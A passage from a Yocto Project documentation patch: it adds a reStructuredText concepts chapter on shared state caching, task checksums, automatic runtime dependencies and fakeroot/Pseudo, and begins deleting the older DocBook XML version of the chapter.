+state. However, building from scratch also takes much longer as it
+generally means rebuilding things that do not necessarily need to be
+rebuilt.
+
+The Yocto Project implements shared state code that supports incremental
+builds. The implementation of the shared state code answers the
+following questions that were fundamental roadblocks within the
+OpenEmbedded incremental build support system:
+
+-  What pieces of the system have changed and what pieces have not
+   changed?
+
+-  How are changed pieces of software removed and replaced?
+
+-  How are pre-built components that do not need to be rebuilt from
+   scratch used when they are available?
+
+For the first question, the build system detects changes in the "inputs"
+to a given task by creating a checksum (or signature) of the task's
+inputs. If the checksum changes, the system assumes the inputs have
+changed and the task needs to be rerun. For the second question, the
+shared state (sstate) code tracks which tasks add which output to the
+build process. This means the output from a given task can be removed,
+upgraded or otherwise manipulated. The third question is partly
+addressed by the solution for the second question assuming the build
+system can fetch the sstate objects from remote locations and install
+them if they are deemed to be valid.
+
+.. note::
+
+   -  The build system does not maintain
+      :term:`PR` information as part of
+      the shared state packages. Consequently, considerations exist that
+      affect maintaining shared state feeds. For information on how the
+      build system works with packages and can track incrementing ``PR``
+      information, see the ":ref:`dev-manual/dev-manual-common-tasks:automatically incrementing a package version number`"
+      section in the Yocto Project Development Tasks Manual.
+
+   -  The code in the build system that supports incremental builds is
+      not simple code. For techniques that help you work around issues
+      related to shared state code, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:viewing metadata used to create the input signature of a shared state task`"
+      and
+      ":ref:`dev-manual/dev-manual-common-tasks:invalidating shared state to force a task to run`"
+      sections both in the Yocto Project Development Tasks Manual.
+
+The rest of this section goes into detail about the overall incremental
+build architecture, the checksums (signatures), and shared state.
+
+.. _concepts-overall-architecture:
+
+Overall Architecture
+--------------------
+
+When determining what parts of the system need to be built, BitBake
+works on a per-task basis rather than a per-recipe basis. You might
+wonder why using a per-task basis is preferred over a per-recipe basis.
+To help explain, consider having the IPK packaging backend enabled and
+then switching to DEB. In this case, the
+:ref:`ref-tasks-install` and
+:ref:`ref-tasks-package` task outputs
+are still valid. However, with a per-recipe approach, the build would
+not include the ``.deb`` files. Consequently, you would have to
+invalidate the whole build and rerun it. Rerunning everything is not the
+best solution. Also, in this case, the core must be "taught" much about
+specific tasks. This methodology does not scale well and does not allow
+users to easily add new tasks in layers or as external recipes without
+touching the packaged-staging core.
+
+.. _overview-checksums:
+
+Checksums (Signatures)
+----------------------
+
+The shared state code uses a checksum, which is a unique signature of a
+task's inputs, to determine if a task needs to be run again. Because it
+is a change in a task's inputs that triggers a rerun, the process needs
+to detect all the inputs to a given task. For shell tasks, this turns
+out to be fairly easy because the build process generates a "run" shell
+script for each task and it is possible to create a checksum that gives
+you a good idea of when the task's data changes.
+
+To complicate the problem, there are things that should not be included
+in the checksum. First, there is the actual specific build path of a
+given task - the :term:`WORKDIR`. It
+does not matter if the work directory changes because it should not
+affect the output for target packages. Also, the build process has the
+objective of making native or cross packages relocatable.
+
+.. note::
+
+   Both native and cross packages run on the
+   build host. However, cross packages generate output for the target
+   architecture.
+
+The checksum therefore needs to exclude ``WORKDIR``. The simplistic
+approach for excluding the work directory is to set ``WORKDIR`` to some
+fixed value and create the checksum for the "run" script.
+
+Another problem results from the "run" scripts containing functions that
+might or might not get called. The incremental build solution contains
+code that figures out dependencies between shell functions. This code is
+used to prune the "run" scripts down to the minimum set, thereby
+alleviating this problem and making the "run" scripts much more readable
+as a bonus.
+
+So far, solutions for shell scripts exist. What about Python tasks? The
+same approach applies even though these tasks are more difficult. The
+process needs to figure out what variables a Python function accesses
+and what functions it calls. Again, the incremental build solution
+contains code that first figures out the variable and function
+dependencies, and then creates a checksum for the data used as the input
+to the task.
+
+Like the ``WORKDIR`` case, situations exist where dependencies should be
+ignored. For these situations, you can instruct the build process to
+ignore a dependency by using a line like the following:
+::
+
+   PACKAGE_ARCHS[vardepsexclude] = "MACHINE"
+
+This example ensures that the :term:`PACKAGE_ARCHS` variable
+does not depend on the value of :term:`MACHINE`, even if it does
+reference it.
+
+Equally, there are cases where you need to add dependencies BitBake is
+not able to find. You can accomplish this by using a line like the
+following:
+::
+
+   PACKAGE_ARCHS[vardeps] = "MACHINE"
+
+This example explicitly
+adds the ``MACHINE`` variable as a dependency for ``PACKAGE_ARCHS``.
+
+As an example, consider a case with in-line Python where BitBake is not
+able to figure out dependencies. When running in debug mode (i.e. using
+``-DDD``), BitBake produces output when it discovers something for which
+it cannot figure out dependencies. The Yocto Project team has currently
+not managed to cover those dependencies in detail and is aware of the
+need to fix this situation.
+
+Thus far, this section has limited discussion to the direct inputs into
+a task. Information based on direct inputs is referred to as the
+"basehash" in the code. However, the question of a task's indirect
+inputs still exits - items already built and present in the
+:term:`Build Directory`. The checksum (or
+signature) for a particular task needs to add the hashes of all the
+tasks on which the particular task depends. Choosing which dependencies
+to add is a policy decision. However, the effect is to generate a master
+checksum that combines the basehash and the hashes of the task's
+dependencies.
+
+At the code level, a variety of ways exist by which both the basehash
+and the dependent task hashes can be influenced. Within the BitBake
+configuration file, you can give BitBake some extra information to help
+it construct the basehash. The following statement effectively results
+in a list of global variable dependency excludes (i.e. variables never
+included in any checksum):
+::
+
+   BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH DL_DIR \\
+       SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \\
+       USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \\
+       PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \\
+       CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_DISABLE LICENSE_PATH SDKPKGSUFFIX"
+
+The
+previous example excludes
+:term:`WORKDIR` since that variable
+is actually constructed as a path within
+:term:`TMPDIR`, which is on the
+whitelist.
+
+The rules for deciding which hashes of dependent tasks to include
+through dependency chains are more complex and are generally
+accomplished with a Python function. The code in
+``meta/lib/oe/sstatesig.py`` shows two examples of this and also
+illustrates how you can insert your own policy into the system if so
+desired. This file defines the two basic signature generators
+:term:`OpenEmbedded-Core (OE-Core)` uses: "OEBasic" and
+"OEBasicHash". By default, a dummy "noop" signature handler is enabled
+in BitBake. This means that behavior is unchanged from previous
+versions. OE-Core uses the "OEBasicHash" signature handler by default
+through this setting in the ``bitbake.conf`` file:
+::
+
+   BB_SIGNATURE_HANDLER ?= "OEBasicHash"
+
+The "OEBasicHash" ``BB_SIGNATURE_HANDLER`` is the same
+as the "OEBasic" version but adds the task hash to the `stamp
+files <#stamp-files-and-the-rerunning-of-tasks>`__. This results in any
+metadata change that changes the task hash, automatically causing the
+task to be run again. This removes the need to bump
+:term:`PR` values, and changes to metadata
+automatically ripple across the build.
+
+It is also worth noting that the end result of these signature
+generators is to make some dependency and hash information available to
+the build. This information includes:
+
+-  ``BB_BASEHASH_task-``\ taskname: The base hashes for each task in the
+   recipe.
+
+-  ``BB_BASEHASH_``\ filename\ ``:``\ taskname: The base hashes for each
+   dependent task.
+
+-  ``BBHASHDEPS_``\ filename\ ``:``\ taskname: The task dependencies for
+   each task.
+
+-  ``BB_TASKHASH``: The hash of the currently running task.
+
+Shared State
+------------
+
+Checksums and dependencies, as discussed in the previous section, solve
+half the problem of supporting a shared state. The other half of the
+problem is being able to use checksum information during the build and
+being able to reuse or rebuild specific components.
+
+The :ref:`sstate <ref-classes-sstate>` class is a
+relatively generic implementation of how to "capture" a snapshot of a
+given task. The idea is that the build process does not care about the
+source of a task's output. Output could be freshly built or it could be
+downloaded and unpacked from somewhere. In other words, the build
+process does not need to worry about its origin.
+
+Two types of output exist. One type is just about creating a directory
+in :term:`WORKDIR`. A good example is
+the output of either
+:ref:`ref-tasks-install` or
+:ref:`ref-tasks-package`. The other
+type of output occurs when a set of data is merged into a shared
+directory tree such as the sysroot.
+
+The Yocto Project team has tried to keep the details of the
+implementation hidden in ``sstate`` class. From a user's perspective,
+adding shared state wrapping to a task is as simple as this
+:ref:`ref-tasks-deploy` example taken
+from the :ref:`deploy <ref-classes-deploy>` class:
+::
+
+   DEPLOYDIR = "${WORKDIR}/deploy-${PN}"
+   SSTATETASKS += "do_deploy"
+   do_deploy[sstate-inputdirs] = "${DEPLOYDIR}"
+   do_deploy[sstate-outputdirs] = "${DEPLOY_DIR_IMAGE}"
+
+   python do_deploy_setscene () {
+       sstate_setscene(d)
+   }
+   addtask do_deploy_setscene
+   do_deploy[dirs] = "${DEPLOYDIR} ${B}"
+   do_deploy[stamp-extra-info] = "${MACHINE_ARCH}"
+
+The following list explains the previous example:
+
+-  Adding "do_deploy" to ``SSTATETASKS`` adds some required
+   sstate-related processing, which is implemented in the
+   :ref:`sstate <ref-classes-sstate>` class, to
+   before and after the
+   :ref:`ref-tasks-deploy` task.
+
+-  The ``do_deploy[sstate-inputdirs] = "${DEPLOYDIR}"`` declares that
+   ``do_deploy`` places its output in ``${DEPLOYDIR}`` when run normally
+   (i.e. when not using the sstate cache). This output becomes the input
+   to the shared state cache.
+
+-  The ``do_deploy[sstate-outputdirs] = "${DEPLOY_DIR_IMAGE}"`` line
+   causes the contents of the shared state cache to be copied to
+   ``${DEPLOY_DIR_IMAGE}``.
+
+   .. note::
+
+      If ``do_deploy`` is not already in the shared state cache or if its input
+      checksum (signature) has changed from when the output was cached, the task
+      runs to populate the shared state cache, after which the contents of the
+      shared state cache is copied to ${:term:`DEPLOY_DIR_IMAGE`}. If
+      ``do_deploy`` is in the shared state cache and its signature indicates
+      that the cached output is still valid (i.e. if no relevant task inputs
+      have changed), then the contents of the shared state cache copies
+      directly to ${``DEPLOY_DIR_IMAGE``} by the ``do_deploy_setscene`` task
+      instead, skipping the ``do_deploy`` task.
+
+-  The following task definition is glue logic needed to make the
+   previous settings effective:
+   ::
+
+      python do_deploy_setscene () {
+          sstate_setscene(d)
+      }
+      addtask do_deploy_setscene
+
+  ``sstate_setscene()`` takes the flags above as input and accelerates the ``do_deploy`` task
+  through the shared state cache if possible. If the task was
+  accelerated, ``sstate_setscene()`` returns True. Otherwise, it
+  returns False, and the normal ``do_deploy`` task runs. For more
+  information, see the ":ref:`setscene <bitbake:bitbake-user-manual/bitbake-user-manual-execution:setscene>`"
+  section in the BitBake User Manual.
+
+-  The ``do_deploy[dirs] = "${DEPLOYDIR} ${B}"`` line creates
+   ``${DEPLOYDIR}`` and ``${B}`` before the ``do_deploy`` task runs, and
+   also sets the current working directory of ``do_deploy`` to ``${B}``.
+   For more information, see the ":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags`"
+   section in the BitBake
+   User Manual.
+
+   .. note::
+
+      In cases where ``sstate-inputdirs`` and ``sstate-outputdirs`` would be
+      the same, you can use ``sstate-plaindirs``. For example, to preserve the
+      ${:term:`PKGD`} and ${:term:`PKGDEST`} output from the ``do_package``
+      task, use the following:
+      ::
+
+              do_package[sstate-plaindirs] = "${PKGD} ${PKGDEST}"
+
+
+-  The ``do_deploy[stamp-extra-info] = "${MACHINE_ARCH}"`` line appends
+   extra metadata to the `stamp
+   file <#stamp-files-and-the-rerunning-of-tasks>`__. In this case, the
+   metadata makes the task specific to a machine's architecture. See
+   ":ref:`bitbake:ref-bitbake-tasklist`"
+   section in the BitBake User Manual for more information on the
+   ``stamp-extra-info`` flag.
+
+-  ``sstate-inputdirs`` and ``sstate-outputdirs`` can also be used with
+   multiple directories. For example, the following declares
+   ``PKGDESTWORK`` and ``SHLIBWORK`` as shared state input directories,
+   which populates the shared state cache, and ``PKGDATA_DIR`` and
+   ``SHLIBSDIR`` as the corresponding shared state output directories:
+   ::
+
+      do_package[sstate-inputdirs] = "${PKGDESTWORK} ${SHLIBSWORKDIR}"
+      do_package[sstate-outputdirs] = "${PKGDATA_DIR} ${SHLIBSDIR}"
+
+-  These methods also include the ability to take a lockfile when
+   manipulating shared state directory structures, for cases where file
+   additions or removals are sensitive:
+   ::
+
+      do_package[sstate-lockfile] = "${PACKAGELOCK}"
+
+Behind the scenes, the shared state code works by looking in
+:term:`SSTATE_DIR` and
+:term:`SSTATE_MIRRORS` for
+shared state files. Here is an example:
+::
+
+   SSTATE_MIRRORS ?= "file://.* https://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
+
+.. note::
+
+   The shared state directory (``SSTATE_DIR``) is organized into two-character
+   subdirectories, where the subdirectory names are based on the first two
+   characters of the hash.
+   If the shared state directory structure for a mirror has the same structure
+   as ``SSTATE_DIR``, you must specify "PATH" as part of the URI to enable the build
+   system to map to the appropriate subdirectory.
+
+The shared state package validity can be detected just by looking at the
+filename since the filename contains the task checksum (or signature) as
+described earlier in this section. If a valid shared state package is
+found, the build process downloads it and uses it to accelerate the
+task.
+
+The build processes use the ``*_setscene`` tasks for the task
+acceleration phase. BitBake goes through this phase before the main
+execution code and tries to accelerate any tasks for which it can find
+shared state packages. If a shared state package for a task is
+available, the shared state package is used. This means the task and any
+tasks on which it is dependent are not executed.
+
+As a real world example, the aim is when building an IPK-based image,
+only the
+:ref:`ref-tasks-package_write_ipk`
+tasks would have their shared state packages fetched and extracted.
+Since the sysroot is not used, it would never get extracted. This is
+another reason why a task-based approach is preferred over a
+recipe-based approach, which would have to install the output from every
+task.
+
+Automatically Added Runtime Dependencies
+========================================
+
+The OpenEmbedded build system automatically adds common types of runtime
+dependencies between packages, which means that you do not need to
+explicitly declare the packages using
+:term:`RDEPENDS`. Three automatic
+mechanisms exist (``shlibdeps``, ``pcdeps``, and ``depchains``) that
+handle shared libraries, package configuration (pkg-config) modules, and
+``-dev`` and ``-dbg`` packages, respectively. For other types of runtime
+dependencies, you must manually declare the dependencies.
+
+-  ``shlibdeps``: During the
+   :ref:`ref-tasks-package` task of
+   each recipe, all shared libraries installed by the recipe are
+   located. For each shared library, the package that contains the
+   shared library is registered as providing the shared library. More
+   specifically, the package is registered as providing the
+   `soname <https://en.wikipedia.org/wiki/Soname>`__ of the library. The
+   resulting shared-library-to-package mapping is saved globally in
+   :term:`PKGDATA_DIR` by the
+   :ref:`ref-tasks-packagedata`
+   task.
+
+   Simultaneously, all executables and shared libraries installed by the
+   recipe are inspected to see what shared libraries they link against.
+   For each shared library dependency that is found, ``PKGDATA_DIR`` is
+   queried to see if some package (likely from a different recipe)
+   contains the shared library. If such a package is found, a runtime
+   dependency is added from the package that depends on the shared
+   library to the package that contains the library.
+
+   The automatically added runtime dependency also includes a version
+   restriction. This version restriction specifies that at least the
+   current version of the package that provides the shared library must
+   be used, as if "package (>= version)" had been added to ``RDEPENDS``.
+   This forces an upgrade of the package containing the shared library
+   when installing the package that depends on the library, if needed.
+
+   If you want to avoid a package being registered as providing a
+   particular shared library (e.g. because the library is for internal
+   use only), then add the library to
+   :term:`PRIVATE_LIBS` inside
+   the package's recipe.
+
+-  ``pcdeps``: During the ``do_package`` task of each recipe, all
+   pkg-config modules (``*.pc`` files) installed by the recipe are
+   located. For each module, the package that contains the module is
+   registered as providing the module. The resulting module-to-package
+   mapping is saved globally in ``PKGDATA_DIR`` by the
+   ``do_packagedata`` task.
+
+   Simultaneously, all pkg-config modules installed by the recipe are
+   inspected to see what other pkg-config modules they depend on. A
+   module is seen as depending on another module if it contains a
+   "Requires:" line that specifies the other module. For each module
+   dependency, ``PKGDATA_DIR`` is queried to see if some package
+   contains the module. If such a package is found, a runtime dependency
+   is added from the package that depends on the module to the package
+   that contains the module.
+
+   .. note::
+
+      The
+      pcdeps
+      mechanism most often infers dependencies between
+      -dev
+      packages.
+
+-  ``depchains``: If a package ``foo`` depends on a package ``bar``,
+   then ``foo-dev`` and ``foo-dbg`` are also made to depend on
+   ``bar-dev`` and ``bar-dbg``, respectively. Taking the ``-dev``
+   packages as an example, the ``bar-dev`` package might provide headers
+   and shared library symlinks needed by ``foo-dev``, which shows the
+   need for a dependency between the packages.
+
+   The dependencies added by ``depchains`` are in the form of
+   :term:`RRECOMMENDS`.
+
+   .. note::
+
+      By default, ``foo-dev`` also has an ``RDEPENDS``-style dependency on
+      ``foo``, because the default value of ``RDEPENDS_${PN}-dev`` (set in
+      bitbake.conf) includes "${PN}".
+
+   To ensure that the dependency chain is never broken, ``-dev`` and
+   ``-dbg`` packages are always generated by default, even if the
+   packages turn out to be empty. See the
+   :term:`ALLOW_EMPTY` variable
+   for more information.
+
+The ``do_package`` task depends on the ``do_packagedata`` task of each
+recipe in :term:`DEPENDS` through use
+of a ``[``\ :ref:`deptask <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`\ ``]``
+declaration, which guarantees that the required
+shared-library/module-to-package mapping information will be available
+when needed as long as ``DEPENDS`` has been correctly set.
+
+Fakeroot and Pseudo
+===================
+
+Some tasks are easier to implement when allowed to perform certain
+operations that are normally reserved for the root user (e.g.
+:ref:`ref-tasks-install`,
+:ref:`do_package_write* <ref-tasks-package_write_deb>`,
+:ref:`ref-tasks-rootfs`, and
+:ref:`do_image* <ref-tasks-image>`). For example,
+the ``do_install`` task benefits from being able to set the UID and GID
+of installed files to arbitrary values.
+
+One approach to allowing tasks to perform root-only operations would be
+to require :term:`BitBake` to run as
+root. However, this method is cumbersome and has security issues. The
+approach that is actually used is to run tasks that benefit from root
+privileges in a "fake" root environment. Within this environment, the
+task and its child processes believe that they are running as the root
+user, and see an internally consistent view of the filesystem. As long
+as generating the final output (e.g. a package or an image) does not
+require root privileges, the fact that some earlier steps ran in a fake
+root environment does not cause problems.
+
+The capability to run tasks in a fake root environment is known as
+"`fakeroot <http://man.he.net/man1/fakeroot>`__", which is derived from
+the BitBake keyword/variable flag that requests a fake root environment
+for a task.
+
+In the :term:`OpenEmbedded Build System`,
+the program that
+implements fakeroot is known as
+`Pseudo <https://www.yoctoproject.org/software-item/pseudo/>`__. Pseudo
+overrides system calls by using the environment variable ``LD_PRELOAD``,
+which results in the illusion of running as root. To keep track of
+"fake" file ownership and permissions resulting from operations that
+require root permissions, Pseudo uses an SQLite 3 database. This
+database is stored in
+``${``\ :term:`WORKDIR`\ ``}/pseudo/files.db``
+for individual recipes. Storing the database in a file as opposed to in
+memory gives persistence between tasks and builds, which is not
+accomplished using fakeroot.
+
+.. note::
+
+   If you add your own task that manipulates the same files or
+   directories as a fakeroot task, then that task also needs to run
+   under fakeroot. Otherwise, the task cannot run root-only operations,
+   and cannot see the fake file ownership and permissions set by the
+   other task. You need to also add a dependency on
+   virtual/fakeroot-native:do_populate_sysroot
+   , giving the following:
+   ::
+
+      fakeroot do_mytask () {
+          ...
+      }
+      do_mytask[depends] += "virtual/fakeroot-native:do_populate_sysroot"
+
+
+For more information, see the
+:term:`FAKEROOT* <bitbake:FAKEROOT>` variables in the
+BitBake User Manual. You can also reference the "`Why Not
+Fakeroot? <https://github.com/wrpseudo/pseudo/wiki/WhyNotFakeroot>`__"
+article for background information on Fakeroot and Pseudo.
diff --git a/documentation/overview-manual/overview-manual-concepts.xml b/documentation/overview-manual/overview-manual-concepts.xml
deleted file mode 100644
index f085dd710d..0000000000
--- a/documentation/overview-manual/overview-manual-concepts.xml
+++ /dev/null
@@ -1,3234 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id=' overview-manual-concepts'>
-<title>Yocto Project Concepts</title>
-
-    <para>
-        This chapter provides explanations for Yocto Project concepts that
-        go beyond the surface of "how-to" information and reference (or
-        look-up) material.
-        Concepts such as components, the
-        <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
-        workflow, cross-development toolchains, shared state cache, and so
-        forth are explained.
-    </para>
-
-    <section id='yocto-project-components'>
-        <title>Yocto Project Components</title>
-
-        <para>
-            The
-            <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
-            task executor together with various types of configuration files
-            form the
-            <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OpenEmbedded-Core</ulink>.
-            This section overviews these components by describing their use and
-            how they interact.
-        </para>
-
-        <para>
-            BitBake handles the parsing and execution of the data files.
-            The data itself is of various types:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>Recipes:</emphasis>
-                    Provides details about particular pieces of software.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Class Data:</emphasis>
-                    Abstracts common build information (e.g. how to build a
-                    Linux kernel).
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Configuration Data:</emphasis>
-                    Defines machine-specific settings, policy decisions, and
-                    so forth.
-                    Configuration data acts as the glue to bind everything
-                    together.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            BitBake knows how to combine multiple data sources together and
-            refers to each data source as a layer.
-            For information on layers, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-            section of the Yocto Project Development Tasks Manual.
-        </para>
-
-        <para>
-            Following are some brief details on these core components.
-            For additional information on how these components interact during
-            a build, see the
-            "<link linkend='openembedded-build-system-build-concepts'>OpenEmbedded Build System Concepts</link>"
-            section.
-        </para>
-
-        <section id='usingpoky-components-bitbake'>
-            <title>BitBake</title>
-
-            <para>
-                BitBake is the tool at the heart of the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
-                and is responsible for parsing the
-                <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>,
-                generating a list of tasks from it, and then executing those
-                tasks.
-            </para>
-
-            <para>
-                This section briefly introduces BitBake.
-                If you want more information on BitBake, see the
-                <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
-            </para>
-
-            <para>
-                To see a list of the options BitBake supports, use either of
-                the following commands:
-                <literallayout class='monospaced'>
-     $ bitbake -h
-     $ bitbake --help
-                </literallayout>
-            </para>
-
-            <para>
-                The most common usage for BitBake is
-                <filename>bitbake <replaceable>packagename</replaceable></filename>,
-                where <filename>packagename</filename> is the name of the
-                package you want to build (referred to as the "target").
-                The target often equates to the first part of a recipe's
-                filename (e.g. "foo" for a recipe named
-                <filename>foo_1.3.0-r0.bb</filename>).
-                So, to process the
-                <filename>matchbox-desktop_1.2.3.bb</filename> recipe file, you
-                might type the following:
-                <literallayout class='monospaced'>
-     $ bitbake matchbox-desktop
-                </literallayout>
-                Several different versions of
-                <filename>matchbox-desktop</filename> might exist.
-                BitBake chooses the one selected by the distribution
-                configuration.
-                You can get more details about how BitBake chooses between
-                different target versions and providers in the
-                "<ulink url='&YOCTO_DOCS_BB_URL;#bb-bitbake-preferences'>Preferences</ulink>"
-                section of the BitBake User Manual.
-            </para>
-
-            <para>
-                BitBake also tries to execute any dependent tasks first.
-                So for example, before building
-                <filename>matchbox-desktop</filename>, BitBake would build a
-                cross compiler and <filename>glibc</filename> if they had not
-                already been built.
-            </para>
-
-            <para>
-                A useful BitBake option to consider is the
-                <filename>-k</filename> or <filename>--continue</filename>
-                option.
-                This option instructs BitBake to try and continue processing
-                the job as long as possible even after encountering an error.
-                When an error occurs, the target that failed and those that
-                depend on it cannot be remade.
-                However, when you use this option other dependencies can
-                still be processed.
-            </para>
-        </section>
-
-        <section id='overview-components-recipes'>
-            <title>Recipes</title>
-
-            <para>
-                Files that have the <filename>.bb</filename> suffix are
-                "recipes" files.
-                In general, a recipe contains information about a single piece
-                of software.
-                This information includes the location from which to download
-                the unaltered source, any source patches to be applied to that
-                source (if needed), which special configuration options to
-                apply, how to compile the source files, and how to package the
-                compiled output.
-            </para>
-
-            <para>
-                The term "package" is sometimes used to refer to recipes.
-                However, since the word "package" is used for the packaged
-                output from the OpenEmbedded build system (i.e.
-                <filename>.ipk</filename> or <filename>.deb</filename> files),
-                this document avoids using the term "package" when referring
-                to recipes.
-            </para>
-        </section>
-
-        <section id='overview-components-classes'>
-            <title>Classes</title>
-
-            <para>
-                Class files (<filename>.bbclass</filename>) contain information
-                that is useful to share between recipes files.
-                An example is the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
-                class, which contains common settings for any application that
-                Autotools uses.
-                The
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-classes'>Classes</ulink>"
-                chapter in the Yocto Project Reference Manual provides
-                details about classes and how to use them.
-            </para>
-        </section>
-
-        <section id='overview-components-configurations'>
-            <title>Configurations</title>
-
-            <para>
-                The configuration files (<filename>.conf</filename>) define
-                various configuration variables that govern the OpenEmbedded
-                build process.
-                These files fall into several areas that define machine
-                configuration options, distribution configuration options,
-                compiler tuning options, general common configuration options,
-                and user configuration options in
-                <filename>conf/local.conf</filename>, which is found in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-            </para>
-        </section>
-    </section>
-
-    <section id='overview-layers'>
-        <title>Layers</title>
-
-        <para>
-            Layers are repositories that contain related metadata (i.e.
-            sets of instructions) that tell the OpenEmbedded build system how
-            to build a target.
-            Yocto Project's
-            <link linkend='the-yocto-project-layer-model'>layer model</link>
-            facilitates collaboration, sharing, customization, and reuse
-            within the Yocto Project development environment.
-            Layers logically separate information for your project.
-            For example, you can use a layer to hold all the configurations
-            for a particular piece of hardware.
-            Isolating hardware-specific configurations allows you to share
-            other metadata by using a different layer where that metadata
-            might be common across several pieces of hardware.
-        </para>
-
-        <para>
-            Many layers exist that work in the Yocto Project development
-            environment.
-            The
-            <ulink url='https://caffelli-staging.yoctoproject.org/software-overview/layers/'>Yocto Project Curated Layer Index</ulink>
-            and
-            <ulink url='http://layers.openembedded.org/layerindex/branch/master/layers/'>OpenEmbedded Layer Index</ulink>
-            both contain layers from which you can use or leverage.
-        </para>
-
-        <para>
-            By convention, layers in the Yocto Project follow a specific form.
-            Conforming to a known structure allows BitBake to make assumptions
-            during builds on where to find types of metadata.
-            You can find procedures and learn about tools (i.e.
-            <filename>bitbake-layers</filename>) for creating layers suitable
-            for the Yocto Project in the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-            section of the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id="openembedded-build-system-build-concepts">
-        <title>OpenEmbedded Build System Concepts</title>
-
-        <para>
-            This section takes a more detailed look inside the build
-            process used by the
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>,
-            which is the build system specific to the Yocto Project.
-            At the heart of the build system is BitBake, the task executor.
-        </para>
-
-        <para>
-            The following diagram represents the high-level workflow of a
-            build.
-            The remainder of this section expands on the fundamental input,
-            output, process, and metadata logical blocks that make up the
-            workflow.
-        </para>
-
-        <para id='general-workflow-figure'>
-            <imagedata fileref="figures/YP-flow-diagram.png" format="PNG" align='center' width="8in"/>
-        </para>
-
-        <para>
-            In general, the build's workflow consists of several functional
-            areas:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>User Configuration:</emphasis>
-                    metadata you can use to control the build process.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Metadata Layers:</emphasis>
-                    Various layers that provide software, machine, and
-                    distro metadata.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Source Files:</emphasis>
-                    Upstream releases, local projects, and SCMs.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Build System:</emphasis>
-                    Processes under the control of
-                    <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>.
-                    This block expands on how BitBake fetches source, applies
-                    patches, completes compilation, analyzes output for package
-                    generation, creates and tests packages, generates images,
-                    and generates cross-development tools.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Package Feeds:</emphasis>
-                    Directories containing output packages (RPM, DEB or IPK),
-                    which are subsequently used in the construction of an
-                    image or Software Development Kit (SDK), produced by the
-                    build system.
-                    These feeds can also be copied and shared using a web
-                    server or other means to facilitate extending or updating
-                    existing images on devices at runtime if runtime package
-                    management is enabled.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Images:</emphasis>
-                    Images produced by the workflow.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Application Development SDK:</emphasis>
-                    Cross-development tools that are produced along with
-                    an image or separately with BitBake.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <section id="user-configuration">
-            <title>User Configuration</title>
-
-            <para>
-                User configuration helps define the build.
-                Through user configuration, you can tell BitBake the
-                target architecture for which you are building the image,
-                where to store downloaded source, and other build properties.
-            </para>
-
-            <para>
-                The following figure shows an expanded representation of the
-                "User Configuration" box of the
-                <link linkend='general-workflow-figure'>general workflow figure</link>:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/user-configuration.png" align="center" width="8in" depth="4.5in" />
-            </para>
-
-            <para>
-                BitBake needs some basic configuration files in order to
-                complete a build.
-                These files are <filename>*.conf</filename> files.
-                The minimally necessary ones reside as example files in the
-                <filename>build/conf</filename> directory of the
-                <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-                For simplicity, this section refers to the Source Directory as
-                the "Poky Directory."
-            </para>
-
-            <para>
-                When you clone the
-                <ulink url='&YOCTO_DOCS_REF_URL;#poky'>Poky</ulink>
-                Git repository or you download and unpack a Yocto Project
-                release, you can set up the Source Directory to be named
-                anything you want.
-                For this discussion, the cloned repository uses the default
-                name <filename>poky</filename>.
-                <note>
-                    The Poky repository is primarily an aggregation of existing
-                    repositories.
-                    It is not a canonical upstream source.
-                </note>
-            </para>
-
-            <para>
-                The <filename>meta-poky</filename> layer inside Poky contains
-                a <filename>conf</filename> directory that has example
-                configuration files.
-                These example files are used as a basis for creating actual
-                configuration files when you source
-                <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>,
